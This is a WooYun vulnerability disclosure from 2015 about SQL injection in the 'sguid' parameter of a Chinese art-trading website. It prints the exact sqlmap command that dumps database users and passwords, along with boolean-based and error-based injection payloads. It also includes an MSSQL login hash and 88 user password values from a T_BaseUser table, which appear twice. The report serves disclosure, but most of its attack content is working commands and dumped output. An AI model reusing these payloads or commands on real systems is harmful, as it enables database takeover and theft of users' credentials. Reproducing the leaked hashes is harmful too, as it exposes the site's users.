当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158892

漏洞标题:原创艺术网存在SQl注射漏洞(DBA权限+系统管理员密码+大量用户密码)

相关厂商:原创艺术网

漏洞作者: 路人甲

提交时间:2015-12-08 00:34

修复时间:2016-01-25 18:11

公开时间:2016-01-25 18:11

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-08: 细节已通知厂商并且等待厂商处理中
2015-12-11: 厂商已经确认,细节仅向厂商公开
2015-12-21: 细节向核心白帽子及相关领域专家公开
2015-12-31: 细节向普通白帽子公开
2016-01-10: 细节向实习白帽子公开
2016-01-25: 细节向公众公开

简要描述:

原创艺术网是专注于做名家大家、草根原创艺术的中国艺术网站,提供全面的艺术新闻、艺术批评、前沿观点交锋、画廊服务、展讯展览、艺术品投资、艺术品交易、艺术品拍卖等及时全面信息的艺术品交易平台,为艺术家提供展示、交易、投融资等服务。

详细说明:

地址:http://**.**.**.**/artdecorationdetail.aspx?sguid=e6c0033100b848dd85888e5c16f40e72

$ python sqlmap.py -u "http://**.**.**.**/artdecorationdetail.aspx?sguid=e6c0033100b848dd85888e5c16f40e72" -p sguid --technique=BE --output-dir=output --random-agent --batch  --no-cast --current-user --is-dba --users --passwords --count --search -C pass


current user:    'sa'
current user is DBA:    True
database management system users [1]:
[*] ##MS_PolicyEventProcessingLogin##
database management system users password hashes:
[*] ##MS_PolicyEventProcessingLogin## [1]:
    password hash: 0x0100dcd1cd01f3622132e0dfc0539d9e47c56d2d7c6abc9d90be
        header: 0x0100
        salt: dcd1cd01
        mixedcase: f3622132e0dfc0539d9e47c56d2d7c6abc9d90be


Database: CloudCopyRight
Table: T_BaseUser
[88 entries]
+----------------------------------+
| sPassword                        |
+----------------------------------+
| /AvImcKTRa3XgPSADcBvwg==         |
| /BYLNFHKCk8=                     |
| /GPRUZlheyvQ+JCfQUCTXw==         |
| /oqRFR+M0utkHXHBpLqOPg==         |
| +/Y9OUOmkx7SlNCVdF64mA==         |
| +8HYaqV/U59Gj9obccICuw==         |
| +gQvOoV9BInCi602P65COg==         |
| +Pph1I+Y9IKXXWbrsxMhNg==         |
| +w0AzPVe/Ux7759du08Dmg==         |
| 0llvK4s4NwBh40KI5f7o9A==         |
| 15LRYA0WPerCknGtisql8g==         |
| 1dmpz/PpEJ5PW3dRCPUWXA==         |
| 1TeUOb6XRg0F/bXhoFRNaQ==         |
| 1uhJCEqMvXWRafqw+xrR6Q==         |
| 24BRTnNAVb8=                     |
| 27dZ3cOjfzQR47vrZX2cZw==         |
| 2rvgM7gzo9A=                     |
| 39vDjCULPtMsP0AY11QxPg==         |
| 3bRZEWJE6wfAe/cb+TF5qg==         |
| 3JHHNSdHAvOddchWxmh7rA==         |
| 3zS8ukY0DCQ=                     |
| 4AZ46j/Y25c=                     |
| 4GxJ5BJ7ddP1sJSEytDIZQ==         |
| 4u4WZSeQH9lCsFR4wrZVLA==         |
| 4wZ9+PMZD7Kl2KG02RtuVw==         |
| 4ZHlpWhBeb2LYBFQq8w77A==         |
| 4ZVxn5V/t40=                     |
| 58TQYRn/L9G0QLVChCk7+w==         |
| 5Tcl6DC/4DGUucB2V7BTqQ==         |
| 6FfJOgFGnzE=                     |
| 6sZszs2pwXmBlZ7+oRKFKA==         |
| 71Q1faolnEobQ8M86VMyRg==         |
| 7ee/+hpJhpYBOB4BTiafsA==         |
| 7GV+vIGe6nQfn1vUs3tdOg==         |
| 7O8QEeU9oO7MuNrAP+NNbCCeUsl8ppec |
| 7TLkdKBRHL0=                     |
| 80jle4blfNZAPUEjcSpBIw==         |
| 8cRjirfp8JsikH2mK+odtQ==         |
| 8fgPDJ4x5JE=                     |
| 8Hg6q0QZdRRn7pVaJrTcJg==         |
| 8tmIy2og0C1qq1wPq2H92g==         |
| 8xY3ZVopegbQlqwW4HjStQ==         |
| 9ftT59s+C6F+VaursFlEOw==         |
| 9lpQYRKYq/0IFr6UQ3cF6A==         |
| 9w/j/OaVVQE=                     |
| a+GSISp/A/n34JHqFkoddA==         |
| A2aS9WYO57JjllfxtC+nvw==         |
| A4bFDi9UqrY=                     |
| a5od3rVOYfSXeJWiIwLSvg==         |
| A6HBeBI+Uwo=                     |
| aF44EcXw3YFVAb5jDY3uoA==         |
| aMMk/4cBJbjVXDOv+Zv3AA==         |
| az0UW279zOvywuyVl3r7Cg==         |
| B2QRX9VmQIc=                     |
| B5Nq+z9eCrt2RKXsptZ3zQ==         |
| bAWOiOFrZGiFnAHn/mCAQg==         |
| BbtkreUA7uLImJ2g0dn4Kw==         |
| bdRGEe64wjEqB77ultdImw==         |
| C9pPDNMkzIDNpVVeysI76A==         |
| cagITV//hHf2Wm5ns/DnmA==         |
| cbhVBU8xipSZzt+UP2VY3YEgC4IEGJSV |
| CIPA9Us67ij1CfNTrwFIjQ==         |
| cLB+6M46HP3XPPyQ4hUuPg==         |
| d9rSxFOnLiumgzd/PDRl5Q==         |
| dgU4SuvalHQiJCHdmgDQmg==         |
| dMlXD+qmu6k/BEqdhkPBZw==         |
| DWc8THNQG70opAFk8eYWww==         |
| DzOTYynkv7QmMoLO6EYlRA==         |
| DzYIXEVc2N0=                     |
| E4sW/XfdUYJOEp+cx5QmHg==         |
| Ed9/eFbJHQmW8+dPWZeYGw==         |
| EfaUvBmeaKg=                     |
| eOUWa96Jzt1BnJ+WPBfpsg==         |
| EpVmVyVenNxFuOpH55N2hg==         |
| EV3t4YD0MuHzkK1cdit1tIa7PRAEPg4F |
| exAWvmZz3QY=                     |
| F1pl8VqO4EDaK0uSzSxaPf4L8r+d6bMH |
| f3Qj6Q0Z8YQFpLF+XXzItA==         |
| fFvoQLYQPS4Y9R0Lgan4NA==         |
| FTsSxVcOd5tL3KLygBzC0A==         |
| FxYhP5pMvGBOxxRvaZS0GQ==         |
| GblCc+ZNGWCo6x6aPdOJBQ==         |
| gsre/ZZytoxi20ZnHa5/YQ==         |
| h2z7KacoZPQGzSYtOC/DqQ==         |
| Ht+WVicBY1I=                     |
| HTV2dJKE11S267KhQgKIOA==         |
| i3+wfuj5tAI=                     |
| iAhsmcXsmhR1o0QcERwwQQ==         |
+----------------------------------+

漏洞证明:

---
Parameter: sguid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sguid=e6c0033100b848dd85888e5c16f40e72' AND 2530=2530 AND 'oxqk'='oxqk
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: sguid=e6c0033100b848dd85888e5c16f40e72' AND 9371=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(98)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (9371=9371) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(98)+CHAR(113))) AND 'vafZ'='vafZ
---
web server operating system: Windows
web application technology: ASP.NET 4.0.30319, ASP.NET, Nginx
back-end DBMS: Microsoft SQL Server 2008
current user:    'sa'
current user is DBA:    True
database management system users [1]:
[*] ##MS_PolicyEventProcessingLogin##
database management system users password hashes:
[*] ##MS_PolicyEventProcessingLogin## [1]:
    password hash: 0x0100dcd1cd01f3622132e0dfc0539d9e47c56d2d7c6abc9d90be
        header: 0x0100
        salt: dcd1cd01
        mixedcase: f3622132e0dfc0539d9e47c56d2d7c6abc9d90be
columns LIKE 'pass' were found in the following databases:
Database: CloudCopyRight
Table: T_BaseUser
[1 column]
+-----------+----------+
| Column    | Type     |
+-----------+----------+
| sPassword | nvarchar |
+-----------+----------+
Database: CloudCopyRight
Table: T_BaseUser
[88 entries]
+----------------------------------+
| sPassword                        |
+----------------------------------+
| /AvImcKTRa3XgPSADcBvwg==         |
| /BYLNFHKCk8=                     |
| /GPRUZlheyvQ+JCfQUCTXw==         |
| /oqRFR+M0utkHXHBpLqOPg==         |
| +/Y9OUOmkx7SlNCVdF64mA==         |
| +8HYaqV/U59Gj9obccICuw==         |
| +gQvOoV9BInCi602P65COg==         |
| +Pph1I+Y9IKXXWbrsxMhNg==         |
| +w0AzPVe/Ux7759du08Dmg==         |
| 0llvK4s4NwBh40KI5f7o9A==         |
| 15LRYA0WPerCknGtisql8g==         |
| 1dmpz/PpEJ5PW3dRCPUWXA==         |
| 1TeUOb6XRg0F/bXhoFRNaQ==         |
| 1uhJCEqMvXWRafqw+xrR6Q==         |
| 24BRTnNAVb8=                     |
| 27dZ3cOjfzQR47vrZX2cZw==         |
| 2rvgM7gzo9A=                     |
| 39vDjCULPtMsP0AY11QxPg==         |
| 3bRZEWJE6wfAe/cb+TF5qg==         |
| 3JHHNSdHAvOddchWxmh7rA==         |
| 3zS8ukY0DCQ=                     |
| 4AZ46j/Y25c=                     |
| 4GxJ5BJ7ddP1sJSEytDIZQ==         |
| 4u4WZSeQH9lCsFR4wrZVLA==         |
| 4wZ9+PMZD7Kl2KG02RtuVw==         |
| 4ZHlpWhBeb2LYBFQq8w77A==         |
| 4ZVxn5V/t40=                     |
| 58TQYRn/L9G0QLVChCk7+w==         |
| 5Tcl6DC/4DGUucB2V7BTqQ==         |
| 6FfJOgFGnzE=                     |
| 6sZszs2pwXmBlZ7+oRKFKA==         |
| 71Q1faolnEobQ8M86VMyRg==         |
| 7ee/+hpJhpYBOB4BTiafsA==         |
| 7GV+vIGe6nQfn1vUs3tdOg==         |
| 7O8QEeU9oO7MuNrAP+NNbCCeUsl8ppec |
| 7TLkdKBRHL0=                     |
| 80jle4blfNZAPUEjcSpBIw==         |
| 8cRjirfp8JsikH2mK+odtQ==         |
| 8fgPDJ4x5JE=                     |
| 8Hg6q0QZdRRn7pVaJrTcJg==         |
| 8tmIy2og0C1qq1wPq2H92g==         |
| 8xY3ZVopegbQlqwW4HjStQ==         |
| 9ftT59s+C6F+VaursFlEOw==         |
| 9lpQYRKYq/0IFr6UQ3cF6A==         |
| 9w/j/OaVVQE=                     |
| a+GSISp/A/n34JHqFkoddA==         |
| A2aS9WYO57JjllfxtC+nvw==         |
| A4bFDi9UqrY=                     |
| a5od3rVOYfSXeJWiIwLSvg==         |
| A6HBeBI+Uwo=                     |
| aF44EcXw3YFVAb5jDY3uoA==         |
| aMMk/4cBJbjVXDOv+Zv3AA==         |
| az0UW279zOvywuyVl3r7Cg==         |
| B2QRX9VmQIc=                     |
| B5Nq+z9eCrt2RKXsptZ3zQ==         |
| bAWOiOFrZGiFnAHn/mCAQg==         |
| BbtkreUA7uLImJ2g0dn4Kw==         |
| bdRGEe64wjEqB77ultdImw==         |
| C9pPDNMkzIDNpVVeysI76A==         |
| cagITV//hHf2Wm5ns/DnmA==         |
| cbhVBU8xipSZzt+UP2VY3YEgC4IEGJSV |
| CIPA9Us67ij1CfNTrwFIjQ==         |
| cLB+6M46HP3XPPyQ4hUuPg==         |
| d9rSxFOnLiumgzd/PDRl5Q==         |
| dgU4SuvalHQiJCHdmgDQmg==         |
| dMlXD+qmu6k/BEqdhkPBZw==         |
| DWc8THNQG70opAFk8eYWww==         |
| DzOTYynkv7QmMoLO6EYlRA==         |
| DzYIXEVc2N0=                     |
| E4sW/XfdUYJOEp+cx5QmHg==         |
| Ed9/eFbJHQmW8+dPWZeYGw==         |
| EfaUvBmeaKg=                     |
| eOUWa96Jzt1BnJ+WPBfpsg==         |
| EpVmVyVenNxFuOpH55N2hg==         |
| EV3t4YD0MuHzkK1cdit1tIa7PRAEPg4F |
| exAWvmZz3QY=                     |
| F1pl8VqO4EDaK0uSzSxaPf4L8r+d6bMH |
| f3Qj6Q0Z8YQFpLF+XXzItA==         |
| fFvoQLYQPS4Y9R0Lgan4NA==         |
| FTsSxVcOd5tL3KLygBzC0A==         |
| FxYhP5pMvGBOxxRvaZS0GQ==         |
| GblCc+ZNGWCo6x6aPdOJBQ==         |
| gsre/ZZytoxi20ZnHa5/YQ==         |
| h2z7KacoZPQGzSYtOC/DqQ==         |
| Ht+WVicBY1I=                     |
| HTV2dJKE11S267KhQgKIOA==         |
| i3+wfuj5tAI=                     |
| iAhsmcXsmhR1o0QcERwwQQ==         |
+----------------------------------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-12-11 19:03

厂商回复:

CNVD未直接复现所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无

漏洞评价:

评价